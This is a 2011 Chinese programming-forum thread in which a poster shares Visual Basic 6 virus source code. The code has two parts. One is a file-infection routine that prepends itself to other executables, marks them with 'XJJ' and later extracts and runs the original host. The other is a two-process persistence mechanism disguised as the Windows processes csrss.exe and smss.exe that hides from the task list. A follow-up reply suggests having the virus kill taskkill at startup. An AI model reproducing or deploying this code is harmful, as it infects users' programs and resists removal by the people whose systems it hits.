|
|
发表于 2011-8-3 15:54:00
|
显示全部楼层
加一个 感染代码
Private Function InfectedFiles(ByVal FilePath As String) As Boolean
Dim MyArray() As Byte
Dim FileArray() As Byte
MyName = App.Path & "\" & App.EXEName & ".exe"
If FileLen(FilePath) > 4194304 Then Exit Function
Open MyName For Binary Access Read As #1 '读取自身文件内容
ReDim MyArray(FileLen(MyName) - 1)
Get #1, , MyArray
Close #1
Open FilePath For Binary Access Read As #1 '读取要感染的问件内容
ReDim FileArray(FileLen(FilePath) - 1)
Get #1, , FileArray
Close #1
If InStr(FileArray, "XJJ") > 0 Then '判断是否被感染
Exit Function
Else
Open FilePath For Binary Access Write As #1 '把自身和感染文件与配置信息一起写到一个新文件去
Put #1, , MyArray
Put #1, , FileArray
Put #1, , "XJJ" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1
Close #1
InfectedFiles = True
End If
End Function
Private Function KillVirus(ByVal VirusPath As String) As Boolean '用于分离病毒主体,因为我太良民了
Dim infected() As Byte
Dim vbArray() As Byte
Dim SplitArray() As String
Dim SplitINI() As String
On Error Resume Next
out = App.Path & "\" & "My.exe" '输出目录
Open VirusPath For Binary Access Read As #1 '读取自身文件内容
ReDim infected(FileLen(VirusPath) - 1)
Get #1, , infected
Close #1
If InStr(StrConv(infected, vbUnicode), "XJJ") > 0 Then '判断是否被感染
SplitArray = Split(StrConv(infected, vbUnicode), "XJJ")
SplitINI = Split(SplitArray(UBound(SplitArray)), ",")
ReDim vbArray(SplitINI(1) - 1)
Open VirusPath For Binary As #1
Get #1, SplitINI(0) + 1, vbArray
Close #1
Open out For Binary As #1
Put #1, , vbArray
Close #1
Shell out, vbNormalFocus '运行
End If
End Function
Private Sub Form_Load()
Me.Hide
InfectedFiles "F:\BD\ProcKiller.exe" '=========测试文件只感染他
If FileLen(App.Path & "\" & App.EXEName & ".exe") > 61920 Then '附体运行
KillVirus App.Path & "\" & App.EXEName & ".exe"
退出代码略
Else
End '
End If
End Sub
加一个 双进程代码
程序1: csrss.exe
Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPmodule = &H8
Private Type MODULEENTRY32
dwSize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 1024
End Type
Private Sub Command1_Click()
End
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
End Sub
Private Sub Form_Load()
App.TaskVisible = False '不要在任务管理内显示
End Sub
Private Sub Timer1_Timer()
Dim ret As Long, lPid As Long
Dim isLive As Boolean
Dim Mode As MODULEENTRY32, Proc As PROCESSENTRY32
Dim hSnapshot As Long, hMSnapshot As Long
Dim sFilename As String
If Dir(App.Path + "\stop") <> "" Then Exit Sub '如果当前文件夹内存在stop这个文件 则停止双进程保护
sFilename = App.Path + "\smss.exe" '另一个进程的路径
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0)
Proc.dwSize = Len(Proc)
Mode.dwSize = Len(Mode)
lPid = ProcessFirst(hSnapshot, Proc)
Do While lPid <> 0
hMSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPmodule, Proc.th32ProcessID)
Mode.szExePath = Space$(256)
ret = Module32First(hMSnapshot, Mode)
If ret > 0 Then
If InStr(1, Mode.szExePath, sFilename, vbTextCompare) > 0 Then 'Mode.szExePath=进程路径
isLive = True '找到目标进程
CloseHandle hMSnapshot
Exit Do
End If
End If
CloseHandle hMSnapshot
lPid = ProcessNext(hSnapshot, Proc)
Loop
CloseHandle hSnapshot
If Not isLive Then
ShellExecute 0, "", sFilename, "", "", 1 '如果目标进程不存在 则启动它
End If
End Sub
程序2: smss.exe
Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPmodule = &H8
Private Type MODULEENTRY32
dwSize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 1024
End Type
Private Sub Command1_Click()
End
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
End Sub
Private Sub Form_Load()
App.TaskVisible = False '不要在任务管理内显示
End Sub
Private Sub Timer1_Timer()
Dim ret As Long, lPid As Long
Dim isLive As Boolean
Dim Mode As MODULEENTRY32, Proc As PROCESSENTRY32
Dim hSnapshot As Long, hMSnapshot As Long
Dim sFilename As String
If Dir(App.Path + "\stop") <> "" Then Exit Sub '如果当前文件夹内存在stop这个文件 则停止双进程保护
sFilename = App.Path + "\csrss.exe"
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0)
Proc.dwSize = Len(Proc)
Mode.dwSize = Len(Mode)
lPid = ProcessFirst(hSnapshot, Proc)
Do While lPid <> 0
hMSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPmodule, Proc.th32ProcessID)
Mode.szExePath = Space$(256)
ret = Module32First(hMSnapshot, Mode)
If ret > 0 Then
If InStr(1, Mode.szExePath, sFilename, vbTextCompare) > 0 Then
isLive = True
CloseHandle hMSnapshot
Exit Do
End If
End If
CloseHandle hMSnapshot
lPid = ProcessNext(hSnapshot, Proc)
Loop
CloseHandle hSnapshot
If Not isLive Then
ShellExecute 0, "", sFilename, "", "", 1
End If
End Sub
申明哈,偶是一个善良滴人....
|
|
楼主: acme_pjz
IP卡
狗仔卡
楼主
so..最好病毒启动的时候把taskkill也弄死吧
